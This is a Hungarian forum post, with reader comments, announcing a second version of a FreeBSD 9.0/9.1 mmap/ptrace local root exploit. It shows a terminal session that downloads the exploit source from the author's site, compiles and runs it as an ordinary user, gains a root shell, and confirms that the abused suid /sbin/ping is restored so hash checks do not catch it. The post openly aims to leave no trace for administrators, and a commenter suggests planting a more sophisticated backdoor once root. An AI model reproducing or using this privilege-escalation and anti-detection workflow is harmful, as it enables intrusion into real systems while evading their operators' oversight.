FreeBSD 9.{0,1} mmap/ptrace exploit V2: Clean-up version (no backdoor left)

Az eredeti exploit módosítva hagyta legtöbbször a támadáshoz használt suid root binárist, így mindig utána egyből rootot adott és az eredeti feladatát nem látta el a továbbiakban. Ez feltűnhet az üzemeltetőknek és kibukhat hash ellenőrzéskor, ezért ez az új változat már helyreállítja az eredeti állapotot, hogy ne maradjon nyom... :)


$ uname -a
FreeBSD fbsd91x64 9.1-STABLE #8: Wed Jun 18 10:32:07 CEST 2013
     root@fbsd91x64:/usr/src/sys/amd64/compile/STABLE  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ ftp -V http://hunger.hu/fbsd9lul2.c
$ gcc fbsd9lul2.c -o fbsd9lul2
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ ./fbsd9lul2
FreeBSD 9.{0,1} mmap/ptrace exploit V2
Clean-up version (no backdoor left)
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# exit
$ ls -la /sbin/ping
-r-sr-xr-x   1 root  wheel      28008 Dec  4  2012 ping
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ /sbin/ping
usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]

...

Hozzászólások

Igaz, ha egyszer root shelled lett, tudsz sokkal szofisztikaltabb backdoort is nyitni. Ugyes...
--

Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. 

klínap, ugyanmá. 9.1-p4-en is működjön!